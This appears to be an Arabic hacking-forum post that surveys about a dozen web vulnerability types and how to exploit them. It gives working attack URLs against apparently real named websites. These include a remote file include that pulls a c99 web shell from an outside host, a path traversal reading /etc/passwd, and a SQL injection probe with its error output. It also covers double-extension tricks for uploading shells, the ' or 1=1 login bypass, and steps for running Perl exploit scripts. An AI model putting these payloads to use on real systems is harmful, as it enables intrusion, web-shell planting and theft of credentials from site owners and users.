بسم الله الرحمن الرحيم

كيفكم اخواني انشا الله بخير

موضوعنا اليوم

نبذه عن معظم انواع الثغرات بإذن الله العظيم

بسم الله بدأنآ

1 - ثغرات ريموت فايل انكلود Remot File include

طبعا من اشهر انواع الثغرات

سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود

بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى

كالشيل مثلا s1

لكن قليلة في وقتنا هذ1

طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1

خلينا نشوف مثال


كود PHP:
http://www.insights.co.il/site.php?page=http://shaja.jeeran.com/c99.txt? 

معنا الموقع هذا

الملف المصاب site.php

المتغير المصاب ?page

=http://shaja.jeeran.com/c99.txt

رابط الشيل اللي هندرجو داخل الموقع

عن طريق الملف + المتغير المصاب

طبعآ لاننسى علامة الاستفهام ؟

انتهيها من النوع الأول

---------------------------------------------

2- SQL injection سكيول انجكشن

طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php

و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp

توضيح :

وهي ثغرات الحقن في قواعد البيانات

خطورة الثغرة خطيرة جدآ

لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)

وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ

مثال على موقع مصاب بثغرة الحقن


كود PHP:
http://www.dtincr.ph/news.php?id=1 


لاحظ لو اضفت بعد المتغير 1 علامة '

فلاحظ وجود الخطأ


كود PHP:
Warningmysql_num_rows(): supplied argument is not a valid MySQL result 
resource in 
/home/dtincr/public_html/news.php on line 20 


طبعا هذا خطأ سكيول

خلينا نشرح عنه شوية

اللي بهمنا news.php?id=1

news.php الملف المصاب

?id=1 المتغير المصاب

طبعا بيكون اكثر من رقم واحد

مثال ?id=42 ...الخ

مثال حي على استغلال ثغرة سكيول انجكشن





طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd

'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي

شرح من الاخ Red-D3v1L

لاكتشاف واستغلال ثغرات الـ sql


كود PHP:
http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html 


انتهينا من ثغرات الحقن

------------------------------------------

3 - ثغرات اللوكال فايل انكلود local file include

طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1

مثل ملف الشادو المهم lol

مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر

http://www.museumsinsel-berlin.de/in.../../etc/passwd

طبعا الملف المصاب index.php

المتغير المصاب ?lang

وقدرنا نستغلو ونقرأ الأمر

انتهى الشرح للنوع الثالث
----------------------------------------------------------

4- ثغرات Remot file upload

طبعا هذا النوع سهل جدا

تسمح لك بادراج ملف

عبارة عن رفع ملف شيل باكثر من صيغة في مراكز التحميل

طبعا شفنا اكثر من ثغرة في مراكر التحميل العربية ولن اتطرق لوضع مثال

طبعا الثغرة بتسمح لك برفع ملف

ويجب عليك انك تشغل مخك

يعني مثلا عندنا مركز تحميل مايقبل صيغة php

نروح نجرب نرفع بامتداد rar

يعني يكون الامتداد كذ1 c99.php.rar

أو c99.php.gif

طبعا بأكثر من امتداد

ومش شرط ان الثغرة تكون في مركز التحميل فقط

احتمال لما تسجل بالموقع تروح ترفع شيل بدل الصورة في ملفك الشخصي lol

مثل ثغرة الـ phpizabi

انتيهنا من النوع الرابع ..

------------------------------------

5-ثغرات الـ Bypass

من اسهل الثغرات الموجودة

بتستطيع تدخل على اللوحة بدون الباسورد وبدون اليوزر

عن طريق ادراج رموز مثل or '1=1

طيب الرموز المستخدمة كثير ة


عن استغلال ثغرات الباي بآس



كود PHP:
http://www.4shared.com/file/101822143/a5d458e8/Bypass.html 


انتهينا من الشرح
.................................................. .

6- Database Backup Dump Vulnerability

ثغرات خطيرة جدا

وتسمح لك بنسخ قواعد البيانات كاملة

طبعا لما تحمل قواعد البيانات

رح تلاقي بآسورد المدير + الاعضاء مشفر بمقياس md5

وطبعا مواقع الفك كثيرة

انتهينا من النوع السادس

------------------------------------------------

7- Remote Admin Password Change

طبعا النوع هذا مشهور جدا

وطبعا الثغرة بتسمح لك بتغير باسورد مدير الموقع بدون الحاجة للباسورد القديم

طبعا المثال الحي ثغرة token joomla

الجميع بيعرفها بتقدر تغير باسورد الادمن باستخدام ' رمز التوكن

انتهينا من النوع السابع

-------------------------------------------------

8- perl exploit

وهي الثغرات اللي بتكون مكتوبة بلغة البيرل

طبعا بتقولولي كيف نعرف انو الثغرة مكتوبة بلغة البيرل

بقوللكم

ملفات البيرل بكون امتدادها مثل


كود PHP:
exploit.pl 

او مثلا ازا رحت موقع سيكيورتي ولقيت بداية الثغرة هالكود

كود PHP:
#!/usr/bin/perl 



اعرف على السريع انو الثغرة مكتوبة بلغة البيرل

استغلالها

لازم تكون منزل على جهازك مترجم البيرل ActivePerl

حتى يترجم ثغرات البيرل

طبعا الاستغلال بكون

حفظ الثغرة بامتداد .pl

مثلا Sec-t.pl

طبعا البرنامج رح تنصب بالمسار هذا


كود PHP:
c:/perl 

بعد ما نحفظ الثغر ة

نروح نضع ملف Sec-t.pl


كود PHP:
c:/perl/bin 

بعد هيك نروح للدوس cmd

كود PHP:
cd 

وندخل لقرص c

بعدها نتجه بالامر

كود PHP:
cd perl 

يصبح مسارنا

كود PHP:
c:/perl 

بعدها

كود PHP:
cd bin 

رح يصبح مسارنا

كود PHP:
C:/pel/bin 

بعدها شغل الثغرة بامر

كود PHP:
perl Sec-t.pl 

بعدها رح يعطيك كيفية استخدام الثغرة

انتهى شرح النوع الثامن

------------------------------------------

9- ثغرات File Disclosure

تستطيع من خلالها قراءة اي ملف من الموقع

انتهى الشرح للنوع التاسع

-----------------------------------
10- ثغرات xxs Cross-Site Scripting

وهي الثغرات اللي تستطيع من خلالها سحب الكوكيز الخاص بالضحية

وتحليله عن طريق برنامج cookies editor

عبر كود معين والأكواد المختصة كثيرة ماشا الله

وشركة الهوتميل مشهورة بثغرات الـ xxs


انتهى الشرح للنوع العاشر

--------------------------------------------

11- ثغرات Command Execution

وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لين**

على المتصفح بعد الاستغلال وتشبه ثغرات اللوكال انكلود s1

لانك تقدر تقرأ ملفات من السيرفر


-----------------------------

12- Buffer overflow ثغرات

الفيض overflow
الفيض هو الزياده عن تحمل الشيء او انك تزيد عن شي فوق المسموح

لبفر اوفر فلو عباره عن خطأ برمجي او نقص برمجي بالاصح يغفل عنه مصمم برنامج
يسمح لك هذا الخطاء او النقص البرمجي انك تعمل تحكم في الذاكره
عندما تدخل بيانات تفوق البفر الموجود في الذاكره مثل العمليه التي قمنا بها في الاوفر فلو
لذلك سميت buffer overflow
والبفر تحدث في حين المبرمج يعطي سماح لأدخال شيء ويغفل عن اعطاء تحديد للشرط
فعند ادخال بيانات في المحدد يحدث هنا البفر

هذا كان توضيح فقط عن ثغرات البفر اوفر فلو

-------------------------------------------------